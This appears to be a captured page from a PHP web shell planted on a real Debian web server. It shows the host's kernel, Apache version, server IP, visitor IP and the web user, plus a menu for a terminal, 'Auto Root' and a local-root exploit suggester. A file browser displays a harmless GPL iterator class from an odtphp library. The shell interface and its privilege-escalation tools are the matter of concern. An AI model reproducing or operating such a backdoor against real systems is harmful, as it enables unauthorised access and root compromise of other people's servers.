Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
webedi.bdcloud.fr /
includes /
odtphp /
Delete
Unzip
Name
Size
Permission
Date
Action
zip
[ DIR ]
drwxr-xr-x
2025-11-08 11:17
Segment.php
11.5
KB
-rw-r--r--
2020-04-18 15:05
SegmentIterator.php
1.11
KB
-rw-r--r--
2020-04-18 15:05
odf.php
40.47
KB
-rw-r--r--
2020-05-12 15:31
Save
Rename
<?php /** * Segments iterator * You need PHP 5.2 at least * You need Zip Extension or PclZip library * * @copyright GPL License 2008 - Julien Pauli - Cyril PIERRE de GEYER - Anaska (http://www.anaska.com) * @license https://www.gnu.org/copyleft/gpl.html GPL License * @version 1.3 */ class SegmentIterator implements RecursiveIterator { private $ref; private $key; public function __construct(array $ref) { $this->ref = $ref; $this->key = 0; $this->keys = array_keys($this->ref); } public function hasChildren() { return $this->valid() && $this->current() instanceof Segment; } public function current() { return $this->ref[$this->keys[$this->key]]; } function getChildren() { return new self($this->current()->children); } public function key() { return $this->key; } public function valid() { return array_key_exists($this->key, $this->keys); } public function rewind() { $this->key = 0; } public function next() { $this->key ++; } }